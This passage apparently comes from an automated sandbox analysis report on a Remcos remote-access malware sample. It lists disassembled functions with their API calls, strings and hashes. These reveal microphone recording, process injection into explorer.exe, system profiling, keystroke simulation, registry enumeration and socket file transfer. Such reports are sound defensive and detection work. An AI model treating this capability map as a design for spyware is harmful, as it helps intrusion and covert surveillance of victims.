                          • Opcode Fuzzy Hash: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                          • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                          Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer
                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                          • API String ID: 3527080286-3064271455
                          • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                          • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                          • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                          • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                          Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                          • Sleep.KERNEL32(00000064), ref: 0041755C
                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateDeleteExecuteShellSleep
                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                          • API String ID: 1462127192-2001430897
                          • Opcode ID: e113b56b21605da8d413aa31776797b2f5429e31524f400d16683b1a7354063e
                          • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                          • Opcode Fuzzy Hash: e113b56b21605da8d413aa31776797b2f5429e31524f400d16683b1a7354063e
                          • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                          Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CurrentProcess
                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                          • API String ID: 2050909247-4242073005
                          • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                          • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                          • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                          • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                          Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          • _strftime.LIBCMT ref: 00401D50
                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                          • API String ID: 3809562944-243156785
                          • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                          • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                          • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                          • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                          Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                          • int.LIBCPMT ref: 00410EBC
                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                          • __Init_thread_footer.LIBCMT ref: 00410F64
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                          • String ID: ,kG$0kG
                          • API String ID: 3815856325-2015055088
                          • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                          • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                          • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                          • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                          Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                          • waveInStart.WINMM ref: 00401CFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                          • String ID: dMG$|MG$PG
                          • API String ID: 1356121797-532278878
                          • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                          • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                          • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                          • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                          Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                          • TranslateMessage.USER32(?), ref: 0041D57A
                          • DispatchMessageA.USER32(?), ref: 0041D584
                          • GetMessageA.USER32 ref: 0041D591
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                          • String ID: Remcos
                          • API String ID: 1970332568-165870891
                          • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                          • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                          • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                          • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                          Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                          • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                          Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                          Download Yara Rule
                          APIs
                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                          • __alloca_probe_16.LIBCMT ref: 00454014
                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                          • __freea.LIBCMT ref: 00454083
                          • __freea.LIBCMT ref: 0045408F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                          • String ID:
                          • API String ID: 201697637-0
                          • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                          • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                          Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • _memcmp.LIBVCRUNTIME ref: 004454A4
                          • _free.LIBCMT ref: 00445515
                          • _free.LIBCMT ref: 0044552E
                          • _free.LIBCMT ref: 00445560
                          • _free.LIBCMT ref: 00445569
                          • _free.LIBCMT ref: 00445575
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorLast$_abort_memcmp
                          • String ID: C
                          • API String ID: 1679612858-1037565863
                          • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                          • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                          Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: tcp$udp
                          • API String ID: 0-3725065008
                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                          Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 004018BE
                          • ExitThread.KERNEL32 ref: 004018F6
                          • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                          • String ID: PkG$XMG$NG$NG
                          • API String ID: 1649129571-3151166067
                          • Opcode ID: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                          • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                          • Opcode Fuzzy Hash: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                          • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                          Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • CloseHandle.KERNEL32(00000000), ref: 00407A88
                          • MoveFileW.KERNEL32 ref: 00407AA5
                          • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                          • String ID: .part
                          • API String ID: 1303771098-3499674018
                          • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                          • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                          Function 0041CE2C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AllocConsole.KERNEL32 ref: 0041CE35
                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Console$Window$AllocOutputShow
                          • String ID: Remcos v$5.1.2 Pro$CONOUT$
                          • API String ID: 4067487056-1584637518
                          • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                          • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                          • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                          • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                          Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • SendInput.USER32 ref: 00419A25
                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InputSend$Virtual
                          • String ID:
                          • API String ID: 1167301434-0
                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                          Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __freea$__alloca_probe_16_free
                          • String ID: a/p$am/pm$h{D
                          • API String ID: 2936374016-2303565833
                          • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                          • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                          Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          • _free.LIBCMT ref: 00444E87
                          • _free.LIBCMT ref: 00444E9E
                          • _free.LIBCMT ref: 00444EBD
                          • _free.LIBCMT ref: 00444ED8
                          • _free.LIBCMT ref: 00444EEF
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$AllocateHeap
                          • String ID: KED
                          • API String ID: 3033488037-2133951994
                          • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                          • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                          Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Enum$InfoQueryValue
                          • String ID: [regsplt]$xUG$TG
                          • API String ID: 3554306468-1165877943
                          • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                          • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                          • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                          • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                          Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
